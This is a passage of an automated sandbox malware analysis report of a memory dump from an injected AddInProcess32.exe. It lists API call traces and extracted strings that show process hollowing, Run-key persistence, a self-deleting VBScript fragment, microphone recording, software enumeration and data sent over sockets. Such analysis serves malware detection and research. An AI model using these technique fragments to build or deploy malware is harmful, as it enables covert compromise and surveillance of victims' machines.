                  • DeleteDC.GDI32(?), ref: 00419258
                  • DeleteDC.GDI32(00000000), ref: 00419263
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                  • String ID: DISPLAY
                  • API String ID: 479521175-865373369
                  • Opcode ID: eeea48b2f12328c67a7764adb0283258d44bef4919e0b7e4c041a6272c1fd371
                  • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                  • Opcode Fuzzy Hash: eeea48b2f12328c67a7764adb0283258d44bef4919e0b7e4c041a6272c1fd371
                  • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                  APIs
                  • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                  • GetProcAddress.KERNEL32(00000000), ref: 00418139
                  • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                  • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                  • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                  • GetProcAddress.KERNEL32(00000000), ref: 00418161
                  • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                  • GetProcAddress.KERNEL32(00000000), ref: 00418175
                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                  • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                  • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                  • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                  • ResumeThread.KERNEL32(?), ref: 00418435
                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                  • GetCurrentProcess.KERNEL32(?), ref: 00418457
                  • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                  • GetLastError.KERNEL32 ref: 0041847A
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                  • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                  • API String ID: 4188446516-3035715614
                  • Opcode ID: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                  • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                  • Opcode Fuzzy Hash: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                  • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                  APIs
                    • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                    • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                    • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                    • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
                    • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                    • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                  • ExitProcess.KERNEL32 ref: 0040D7D0
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                  • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                  • API String ID: 1861856835-332907002
                  • Opcode ID: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
                  • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                  • Opcode Fuzzy Hash: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
                  • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                  APIs
                    • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                    • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                    • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                    • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
                    • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                    • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                  • ExitProcess.KERNEL32 ref: 0040D419
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                  • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                  • API String ID: 3797177996-2557013105
                  • Opcode ID: d286f588f5818cca07a6e4c27455efb45431ebdc6a01d8eb82299511fc22b521
                  • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                  • Opcode Fuzzy Hash: d286f588f5818cca07a6e4c27455efb45431ebdc6a01d8eb82299511fc22b521
                  • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                  APIs
                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                  • ExitProcess.KERNEL32(00000000), ref: 004124A0
                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                  • CloseHandle.KERNEL32(00000000), ref: 0041253B
                  • GetCurrentProcessId.KERNEL32 ref: 00412541
                  • PathFileExistsW.SHLWAPI(?), ref: 00412572
                  • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                  • lstrcatW.KERNEL32 ref: 00412601
                    • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                  • Sleep.KERNEL32(000001F4), ref: 00412682
                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                  • CloseHandle.KERNEL32(00000000), ref: 004126A9
                  • GetCurrentProcessId.KERNEL32 ref: 004126AF
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                  • String ID: .exe$8SG$WDH$exepath$open$temp_
                  • API String ID: 2649220323-436679193
                  • Opcode ID: 68a6d1683c491aa5f69a5158323edd29138381c8b32ecc661663b13424b24b94
                  • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                  • Opcode Fuzzy Hash: 68a6d1683c491aa5f69a5158323edd29138381c8b32ecc661663b13424b24b94
                  • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                  APIs
                  • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                  • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                  • PathFileExistsW.SHLWAPI(00000000), ref: 0041B18E
                  • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                  • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                  • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                  • SetEvent.KERNEL32 ref: 0041B219
                  • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                  • CloseHandle.KERNEL32 ref: 0041B23A
                  • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                  • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                  • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                  • API String ID: 738084811-2094122233
                  • Opcode ID: a32571104eb0df3ab7bb69bc80b77b3340521799c31937e3b9a7319bb649b0aa
                  • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                  • Opcode Fuzzy Hash: a32571104eb0df3ab7bb69bc80b77b3340521799c31937e3b9a7319bb649b0aa
                  • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                  APIs
                  • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                  • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                  • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                  • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                  • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                  • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                  • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                  • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                  • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Write$Create
                  • String ID: RIFF$WAVE$data$fmt
                  • API String ID: 1602526932-4212202414
                  • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                  • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                  • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                  • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                  APIs
                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000001,0040764D,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                  • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                  • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                  • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                  • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                  • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                  • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                  • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressHandleModuleProc
                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                  • API String ID: 1646373207-4283035339
                  • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                  • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                  • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                  • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                  APIs
                  • _wcslen.LIBCMT ref: 0040CE07
                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                  • CopyFileW.KERNEL32 ref: 0040CED0
                  • _wcslen.LIBCMT ref: 0040CEE6
                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                  • CopyFileW.KERNEL32 ref: 0040CF84
                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                  • _wcslen.LIBCMT ref: 0040CFC6
                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                  • CloseHandle.KERNEL32 ref: 0040D02D
                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                  • ExitProcess.KERNEL32 ref: 0040D062
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                  • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$del$open
                  • API String ID: 1579085052-1506045317
                  • Opcode ID: 796ba6405bd8a90df0372751ab310b3abe3628a0db2faaf63edc81667cb98c6a
                  • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                  • Opcode Fuzzy Hash: 796ba6405bd8a90df0372751ab310b3abe3628a0db2faaf63edc81667cb98c6a
                  • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                  APIs
                  • lstrlenW.KERNEL32(?), ref: 0041C036
                  • _memcmp.LIBVCRUNTIME ref: 0041C04E
                  • lstrlenW.KERNEL32(?), ref: 0041C067
                  • FindFirstVolumeW.KERNEL32 ref: 0041C0A2
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                  • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                  • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                  • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                  • _wcslen.LIBCMT ref: 0041C13B
                  • FindVolumeClose.KERNEL32 ref: 0041C15B
                  • GetLastError.KERNEL32 ref: 0041C173
                  • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                  • lstrcatW.KERNEL32 ref: 0041C1B9
                  • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                  • GetLastError.KERNEL32 ref: 0041C1D0
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                  • String ID: ?
                  • API String ID: 3941738427-1684325040
                  • Opcode ID: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                  • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                  • Opcode Fuzzy Hash: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                  • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                  APIs
                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                  • LoadLibraryA.KERNEL32(?), ref: 00414E17
                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                  • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                  • LoadLibraryA.KERNEL32(?), ref: 00414E76
                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                  • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                  • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Library$AddressFreeProc$Load$DirectorySystem
                  • String ID: IA$\ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                  • API String ID: 2490988753-1941338355
                  • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                  • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                  • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                  • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                    • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                    • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
                    • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587
                  • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                  • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                  • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                  • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                  • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                  • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                  • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                  • Sleep.KERNEL32(00000064), ref: 00412E94
                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                  • String ID: /stext "$0TG$0TG$NG$NG
                  • API String ID: 1223786279-2576077980
                  • Opcode ID: 32d90d55cb05bb5b069b036a4d337625a659ecb65ee468f1972c10dd974b4365
                  • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                  • Opcode Fuzzy Hash: 32d90d55cb05bb5b069b036a4d337625a659ecb65ee468f1972c10dd974b4365
                  • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
                  APIs
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _free$EnvironmentVariable
                  • String ID:
                  • API String ID: 1464849758-0
                  • Opcode ID: 8c398c17f7198d8e95fa4204fbdfe0aa09a5082618e125736fc7a2c78f972757
                  • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                  • Opcode Fuzzy Hash: 8c398c17f7198d8e95fa4204fbdfe0aa09a5082618e125736fc7a2c78f972757
                  • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                  • RegEnumKeyExA.ADVAPI32 ref: 0041C6F5
                  • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                  • API String ID: 1332880857-3714951968
                  • Opcode ID: 131f557390299a5fb98f0b65c13fdfd9cb57ca643134b75c275777f897c8710a
                  • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                  • Opcode Fuzzy Hash: 131f557390299a5fb98f0b65c13fdfd9cb57ca643134b75c275777f897c8710a
                  • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                  APIs
                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                  • GetCursorPos.USER32(?), ref: 0041D5E9
                  • SetForegroundWindow.USER32(?), ref: 0041D5F2
                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                  • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                  • ExitProcess.KERNEL32 ref: 0041D665
                  • CreatePopupMenu.USER32 ref: 0041D66B
                  • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                  • String ID: Close
                  • API String ID: 1657328048-3535843008
                  • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                  • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                  • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                  • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                  APIs
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _free$Info
                  • String ID:
                  • API String ID: 2509303402-0
                  • Opcode ID: 5869cf30a6bc76c96b91810e50649579c2b114ba446574e9e9616964d5930224
                  • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                  • Opcode Fuzzy Hash: 5869cf30a6bc76c96b91810e50649579c2b114ba446574e9e9616964d5930224
                  • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                  APIs
                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408CE3
                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                  • __aulldiv.LIBCMT ref: 00408D4D
